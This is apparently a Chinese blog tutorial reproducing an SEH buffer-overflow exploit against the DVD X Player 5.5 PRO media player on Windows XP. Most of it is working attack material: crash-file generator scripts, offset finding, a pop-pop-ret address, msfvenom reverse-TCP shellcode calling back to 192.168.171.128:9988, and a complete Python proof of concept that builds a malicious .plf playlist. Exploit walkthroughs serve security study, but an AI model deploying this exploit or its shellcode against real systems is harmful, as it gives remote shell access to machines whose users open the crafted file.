• DVD X Player 5.5 PRO


    DVD X Player 5.5 PRO

    前置知识

    环境

    • Windows XP Pro

    • Immunity debugger

    • mona.py

    • python2.7

    • 漏洞软件

    SEH

    SEH是Windows系统的一项机制, 它使用链表结构记录一系列数据. 当一个异常触发, 操作系统会遍历这个链表. 异常处理程序可以评估能否处理这个异常, 不能的话就传给链表的下一个处理函数. 处理异常必须满足两个要素:(1)一个指向当前异常处理函数的指针(SEH) (2)指向下一个异常处理结构的指针(Nseh). 因为Windows堆栈是向下生长的, 所以我们看到异常处理结构是颠倒的[nSEH…[SEH]. 当一个异常出现, 最近一个nSEH的地址会保存在esp+8地址处

    SEH漏洞思路:利用pop pop retn指令地址覆盖掉SEH,pop pop retn执行后会跳到nSEH处执行,控制nSEH的空间,使之跳转到shellcode处。

    漏洞复现

    #!/usr/bin/python
    filename="evil.plf"
    buffer = "A"*2000
    textfile = open(filename , 'w')
    textfile.write(buffer)
    textfile.close()
    

    利用上面脚本生成溢出文件,使用immunity debugger附加播放器进程后打开。

    image-20200504225556139

    Alt+S查看SEH链

    image-20200504225727462

    SEH与nSEH链已被覆盖。

    接着用pattern_create生成相同长度的字符,再用mona来检测偏移

    msf5 > /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 2000
    [*] exec: /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 2000
    
    Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
    

    ![image-20200504232802260](DVD X Player 5.5 PRO.assets/Mq5NLXWxVF2SyeY.png)

    可以看到SEH在608处被覆盖,接下来这样来替换前面的字符

    buffer = "A"608 + [nSEH] + [SEH] + "D"1384

    buffer = "A"608 + "B"4 + "C"4 + "D"1384

    用!mona seh查找pop pop retn地址

    image-20200505001045868

    0x61617619 : pop esi # pop edi # ret  | asciiprint,ascii {PAGE_EXECUTE_READ} [EPG.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.12.21.2006 (C:VulWindows Exploit3DVD X Player 5.5 ProfessionalEPG.dll)
    

    buffer = "A"608 + "B"4 + "x19x76x61x61"+ "D"*1384

    "x19x76x61x61"执行pop pop retn后会跳转到B*4处,将B*4替换成跳转到shellcode地址的操作码,在D中插入我们的shellcode,就可以执行命令

    Padding+nSEH+SEH+Shellcode

    选择跳转地址为0012F5C0,则jmp 0012F5C0代码为xEBx06

    则新的buffer为buffer = "A"604 + "xEBx06x90x90" + "x19x76x61x61"+ "D"1388

    生成shellcode

    root@ubuntu:/home/vincebye# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.171.128 LPORT=9988 -f c -b 'x00x0ax0dx1a' 
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    Found 11 compatible encoders
    Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
    x86/shikata_ga_nai succeeded with size 351 (iteration=0)
    x86/shikata_ga_nai chosen with final size 351
    Payload size: 351 bytes
    Final size of c file: 1500 bytes
    unsigned char buf[] = 
    "xdbxd1xd9x74x24xf4x58xbdxfdxd6x1bxc6x31xc9xb1"
    "x52x83xc0x04x31x68x13x03x95xc5xf9x33x99x02x7f"
    "xbbx61xd3xe0x35x84xe2x20x21xcdx55x91x21x83x59"
    "x5ax67x37xe9x2exa0x38x5ax84x96x77x5bxb5xebx16"
    "xdfxc4x3fxf8xdex06x32xf9x27x7axbfxabxf0xf0x12"
    "x5bx74x4cxafxd0xc6x40xb7x05x9ex63x96x98x94x3d"
    "x38x1bx78x36x71x03x9dx73xcbxb8x55x0fxcax68xa4"
    "xf0x61x55x08x03x7bx92xafxfcx0exeaxd3x81x08x29"
    "xa9x5dx9cxa9x09x15x06x15xabxfaxd1xdexa7xb7x96"
    "xb8xabx46x7axb3xd0xc3x7dx13x51x97x59xb7x39x43"
    "xc3xeexe7x22xfcxf0x47x9ax58x7bx65xcfxd0x26xe2"
    "x3cxd9xd8xf2x2ax6axabxc0xf5xc0x23x69x7dxcfxb4"
    "x8ex54xb7x2ax71x57xc8x63xb6x03x98x1bx1fx2cx73"
    "xdbxa0xf9xd4x8bx0ex52x95x7bxefx02x7dx91xe0x7d"
    "x9dx9ax2ax16x34x61xbdxd9x61xc2xbdxb2x73x14x99"
    "x46xfdxf2x8fx56xabxadx27xcexf6x25xd9x0fx2dx40"
    "xd9x84xc2xb5x94x6cxaexa5x41x9dxe5x97xc4xa2xd3"
    "xbfx8bx31xb8x3fxc5x29x17x68x82x9cx6exfcx3ex86"
    "xd8xe2xc2x5ex22xa6x18xa3xadx27xecx9fx89x37x28"
    "x1fx96x63xe4x76x40xddx42x21x22xb7x1cx9execx5f"
    "xd8xecx2ex19xe5x38xd9xc5x54x95x9cxfax59x71x29"
    "x83x87xe1xd6x5ex0cx11x9dxc2x25xbax78x97x77xa7"
    "x7ax42xbbxdexf8x66x44x25xe0x03x41x61xa6xf8x3b"
    "xfax43xfexe8xfbx41";
    

    反连shell

    image-20200505142109824

    POC代码如下

    #!/usr/bin/python
    filename="evilexp.plf"
    Shellcode = (
    "xdbxd1xd9x74x24xf4x58xbdxfdxd6x1bxc6x31xc9xb1"
    "x52x83xc0x04x31x68x13x03x95xc5xf9x33x99x02x7f"
    "xbbx61xd3xe0x35x84xe2x20x21xcdx55x91x21x83x59"
    "x5ax67x37xe9x2exa0x38x5ax84x96x77x5bxb5xebx16"
    "xdfxc4x3fxf8xdex06x32xf9x27x7axbfxabxf0xf0x12"
    "x5bx74x4cxafxd0xc6x40xb7x05x9ex63x96x98x94x3d"
    "x38x1bx78x36x71x03x9dx73xcbxb8x55x0fxcax68xa4"
    "xf0x61x55x08x03x7bx92xafxfcx0exeaxd3x81x08x29"
    "xa9x5dx9cxa9x09x15x06x15xabxfaxd1xdexa7xb7x96"
    "xb8xabx46x7axb3xd0xc3x7dx13x51x97x59xb7x39x43"
    "xc3xeexe7x22xfcxf0x47x9ax58x7bx65xcfxd0x26xe2"
    "x3cxd9xd8xf2x2ax6axabxc0xf5xc0x23x69x7dxcfxb4"
    "x8ex54xb7x2ax71x57xc8x63xb6x03x98x1bx1fx2cx73"
    "xdbxa0xf9xd4x8bx0ex52x95x7bxefx02x7dx91xe0x7d"
    "x9dx9ax2ax16x34x61xbdxd9x61xc2xbdxb2x73x14x99"
    "x46xfdxf2x8fx56xabxadx27xcexf6x25xd9x0fx2dx40"
    "xd9x84xc2xb5x94x6cxaexa5x41x9dxe5x97xc4xa2xd3"
    "xbfx8bx31xb8x3fxc5x29x17x68x82x9cx6exfcx3ex86"
    "xd8xe2xc2x5ex22xa6x18xa3xadx27xecx9fx89x37x28"
    "x1fx96x63xe4x76x40xddx42x21x22xb7x1cx9execx5f"
    "xd8xecx2ex19xe5x38xd9xc5x54x95x9cxfax59x71x29"
    "x83x87xe1xd6x5ex0cx11x9dxc2x25xbax78x97x77xa7"
    "x7ax42xbbxdexf8x66x44x25xe0x03x41x61xa6xf8x3b"
    "xfax43xfexe8xfbx41")
      
    
    evil = "x90"*20 + Shellcode
    buffer = "A"*608 + "xEBx06x90x90" + "x19x76x61x61" + evil + "B"*(1384-len(evil))
       
    textfile = open(filename , 'w')
    textfile.write(buffer)
    textfile.close()
    
  • 相关阅读:
    常用模板
    pascal 的字符串操作
    war2 洛谷模拟赛day2 t3 状压
    状压搜索 洛谷T47092 作业
    Milking Order
    洛谷九月月赛T1 思考
    C数列下标 牛客OI赛制测试赛2
    钓鱼 洛谷p1717
    机房人民大团结(DP)
    Spark的Straggler深入学习(2):思考Block和Partition的划分问题——以论文为参考
  • 原文地址:https://www.cnblogs.com/vincebye/p/12839004.html
Copyright © 2020-2023  润新知